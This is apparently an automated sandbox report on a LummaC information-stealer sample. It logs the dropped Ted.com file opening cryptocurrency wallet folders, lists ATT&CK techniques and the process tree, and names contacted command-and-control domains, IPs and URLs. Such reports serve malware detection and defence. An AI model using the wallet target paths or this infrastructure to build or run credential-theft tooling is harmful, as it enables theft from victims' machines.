      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		2
      OS Credential Dumping      		13
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		1
      Bootkit      		12
      Process Injection      		2
      Obfuscated Files or Information      		11
      Input Capture      		25
      System Information Discovery      		Remote Desktop Protocol31
      Data from Local System      		11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts12
      Command and Scripting Interpreter      		Logon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading      		Security Account Manager1
      Query Registry      		SMB/Windows Admin Shares11
      Input Capture      		3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      PowerShell      		Login HookLogin Hook111
      Masquerading      		NTDS321
      Security Software Discovery      		Distributed Component Object Model1
      Clipboard Data      		14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script221
      Virtualization/Sandbox Evasion      		LSA Secrets3
      Process Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Process Injection      		Cached Domain Credentials221
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Bootkit      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
      System Owner/User Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581281 Sample: appFile.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 94 walkyvulgari.click 2->94 96 dfgh.online 2->96 98 3 other IPs or domains 2->98 110 Suricata IDS alerts for network traffic 2->110 112 Antivirus detection for URL or domain 2->112 114 Multi AV Scanner detection for submitted file 2->114 116 4 other signatures 2->116 14 appFile.exe 22 2->14         started        signatures3 process4 process5 16 cmd.exe 2 14->16         started        file6 74 C:\Users\user\AppData\Local\Temp\...\Ted.com, PE32 16->74 dropped 108 Drops PE files with a suspicious file extension 16->108 20 Ted.com 1 16->20         started        25 cmd.exe 2 16->25         started        27 extrac32.exe 21 16->27         started        29 8 other processes 16->29 signatures7 process8 dnsIp9 100 walkyvulgari.click 104.21.94.92, 443, 49733, 49737 CLOUDFLARENETUS United States 20->100 102 cegu.shop 185.161.251.21, 443, 49744 NTLGB United Kingdom 20->102 104 klipsyzogey.shop 172.67.214.186, 443, 49745 CLOUDFLARENETUS United States 20->104 76 C:\...\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, PE32 20->76 dropped 118 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->118 120 Suspicious powershell command line found 20->120 122 Query firmware table information (likely to detect VMs) 20->122 124 3 other signatures 20->124 31 S25734VPZD3VQL5I0DLUI2DAUAHZO.exe 2 20->31         started        35 powershell.exe 15 15 20->35         started        file10 signatures11 process12 file13 92 C:\...\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, PE32 31->92 dropped 106 Multi AV Scanner detection for dropped file 31->106 37 S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp 3 5 31->37         started        40 conhost.exe 35->40         started        signatures14 process15 file16 78 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 37->78 dropped 80 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 37->80 dropped 42 S25734VPZD3VQL5I0DLUI2DAUAHZO.exe 37->42         started        process17 file18 82 C:\...\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, PE32 42->82 dropped 45 S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp 42->45         started        process19 file20 84 C:\Users\user\AppData\...\vsv_tool.exe (copy), PE32 45->84 dropped 86 C:\Users\user\AppData\...\is-NG40A.tmp, PE32 45->86 dropped 88 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 45->88 dropped 90 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 45->90 dropped 48 cmd.exe 45->48         started        50 cmd.exe 45->50         started        52 cmd.exe 45->52         started        54 5 other processes 45->54 process21 process22 56 conhost.exe 48->56         started        58 tasklist.exe 48->58         started        60 find.exe 48->60         started        62 conhost.exe 50->62         started        64 tasklist.exe 50->64         started        66 find.exe 50->66         started        70 3 other processes 52->70 68 conhost.exe 54->68         started        72 9 other processes 54->72

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      appFile.exe14%VirustotalBrowse
      appFile.exe8%ReversingLabsWin32.Trojan.Generic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\723356\Ted.com0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe13%ReversingLabsWin32.Trojan.Hulk
      C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-O7LIQ.tmp\_isetup\_isdecmp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-O7LIQ.tmp\_isetup\_setup64.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-QU1EC.tmp\_isetup\_isdecmp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-QU1EC.tmp\_isetup\_setup64.tmp0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://localhost/data.svc0%Avira URL Cloudsafe
      http://crl.usertr0%Avira URL Cloudsafe
      http://crl.8#0%Avira URL Cloudsafe
      http://crl.micn0%Avira URL Cloudsafe
      https://dfgh.online/invoker.php?compName=0%Avira URL Cloudsafe
      http://crl.microsoft.coX0%Avira URL Cloudsafe
      http://www.faststone.org/FSCTutorial.htmU0%Avira URL Cloudsafe
      http://crl.microsyFailed0%Avira URL Cloudsafe
      http://www.microsoft.A0%Avira URL Cloudsafe
      https://dfgh.online0%Avira URL Cloudsafe
      http://www.faststone.org/FSCTutorial.htm0%Avira URL Cloudsafe
      http://crl.microsy0%Avira URL Cloudsafe
      https://klipsyzogey.shop/int_clp_sha.txt100%Avira URL Cloudmalware
      https://www.faststone.org/order.htmU0%Avira URL Cloudsafe
      https://cegu.shop/8574262446/ph.txt0%Avira URL Cloudsafe
      http://www.ws-i.org/Profiles/BasicProfile-1.1.html0%Avira URL Cloudsafe
      http://www.faststone.org/U0%Avira URL Cloudsafe
      http://crl.usertru0%Avira URL Cloudsafe
      http://www.faststone.org/0%Avira URL Cloudsafe
      https://walkyvulgari.click/api0%Avira URL Cloudsafe
      https://dfgh.online/invoker.php?compName=user-PC0%Avira URL Cloudsafe
      http://TransportHTTP/1.0GETAccept:0%Avira URL Cloudsafe
      https://www.faststone.org/order.htm0%Avira URL Cloudsafe
      https://go.microsRSION_INFO0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      cegu.shop
      		185.161.251.21
      		truefalse
        		unknown
        klipsyzogey.shop
        		172.67.214.186
        		truefalse
          		high
          walkyvulgari.click
          		104.21.94.92
          		truetrue
            		unknown
            mzaisLRxVRUnOUQWdGyHcVQZJ.mzaisLRxVRUnOUQWdGyHcVQZJ
            		unknown
            		unknownfalse
              		unknown
              dfgh.online
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://klipsyzogey.shop/int_clp_sha.txtfalse
                • Avira URL Cloud: malware
                		unknown
                https://walkyvulgari.click/apitrue
                • Avira URL Cloud: safe
                		unknown
                https://cegu.shop/8574262446/ph.txtfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://localhost/data.svcappFile.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUS25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000000.2354264175.0000000000C61000.00000020.00000001.01000000.0000000A.sdmpfalse
                  		high
                  http://repository.certum.pl/cscasha2.cer0S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                    		high
                    http://ocsp.sectigo.com0S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                      		high
                      http://crl.usertrS25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.microsoft.coappFile.exefalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://dfgh.online/invoker.php?compName=powershell.exe, 00000010.00000002.2149016419.0000000002D99000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/appFile.exefalse
                            		high
                            http://www.microsoft.AappFile.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.autoitscript.com/autoit3/Ted.com.1.dr, Serious.8.drfalse
                              		high
                              http://schemas.xmlsoap.org/soap/httpappFile.exefalse
                                		high
                                http://www.faststone.org/FSCTutorial.htmUvsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.remobjects.com/psS25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000003.2357659279.00000000033FF000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000003.2360775328.000000007F04B000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000000.2363259351.0000000000C01000.00000020.00000001.01000000.0000000B.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000000.2382444621.0000000000E6D000.00000020.00000001.01000000.0000000D.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.18.dr, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.20.drfalse
                                  		high
                                  http://crt.sectigo.com/SectigS25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.microsoft.coXappFile.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://subca.ocsp-certum.com01S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                      		high
                                      https://contoso.com/powershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.innosetup.com/S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000003.2357659279.00000000033FF000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.exe, 00000012.00000003.2360775328.000000007F04B000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000000.2363259351.0000000000C01000.00000020.00000001.01000000.0000000B.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000000.2382444621.0000000000E6D000.00000020.00000001.01000000.0000000D.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.18.dr, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.20.drfalse
                                            		high
                                            http://crl.8#appFile.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://sectigo.com/CPS0DS25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                              		high
                                              https://dfgh.onlinepowershell.exe, 00000010.00000002.2150012095.00000000050D2000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://jrsoftware.org0S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                		high
                                                https://jrsoftware.org/S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                  		high
                                                  https://dfgh.online/invoker.php?compname=powershell.exe, 00000010.00000002.2149643028.0000000003090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.2150012095.0000000004D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.certum.pl/CPS0S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                        		high
                                                        http://crl.microsyFailedappFile.exefalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crl.micnappFile.exefalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://sectigo.com/CPS0S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://repository.certum.pl/ctnca.cer09S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                              		high
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2150012095.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.certum.pl/ctnca.crl0kS25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                                  		high
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2150012095.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://go.micropowershell.exe, 00000010.00000002.2150012095.0000000005122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.faststone.org/FSCTutorial.htmvsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://contoso.com/Iconpowershell.exe, 00000010.00000002.2152083123.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.faststone.org/order.htmUvsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://crl.microsyappFile.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.autoitscript.com/autoit3/XTed.com, 0000000B.00000000.1730188123.0000000000705000.00000002.00000001.01000000.00000007.sdmp, Ted.com.1.dr, Remarkable.8.drfalse
                                                                          		high
                                                                          http://www.microsoft.appFile.exefalse
                                                                            		high
                                                                            http://nsis.sf.net/NSIS_ErrorErrorappFile.exefalse
                                                                              		high
                                                                              https://www.certum.pl/CPS0S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                                                		high
                                                                                http://www.faststone.org/vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://crl.certum.pl/cscasha2.crl0qS25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                                                  		high
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2150012095.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.usertruS25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://cscasha2.ocsp-certum.com04S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                                                      		high
                                                                                      http://www.ws-i.org/Profiles/BasicProfile-1.1.htmlappFile.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.faststone.org/Uvsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tS25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                                                        		high
                                                                                        http://crl.microsofappFile.exefalse
                                                                                          		high
                                                                                          https://dfgh.online/invoker.php?compName=user-PCpowershell.exe, 00000010.00000002.2150012095.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2150012095.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drfalse
                                                                                            		high
                                                                                            https://go.microsRSION_INFOappFile.exefalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.faststone.org/order.htmvsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://TransportHTTP/1.0GETAccept:appFile.exefalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://aka.ms/pscore6lBtqpowershell.exe, 00000010.00000002.2150012095.0000000004D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.microsappFile.exefalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                185.161.251.21
                                                                                                		cegu.shopUnited Kingdom
                                                                                                		5089NTLGBfalse
                                                                                                172.67.214.186
                                                                                                		klipsyzogey.shopUnited States
                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                104.21.94.92
                                                                                                		walkyvulgari.clickUnited States
                                                                                                		13335CLOUDFLARENETUStrue

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1581281
                                                                                                Start date and time:2024-12-27 10:20:11 +01:00
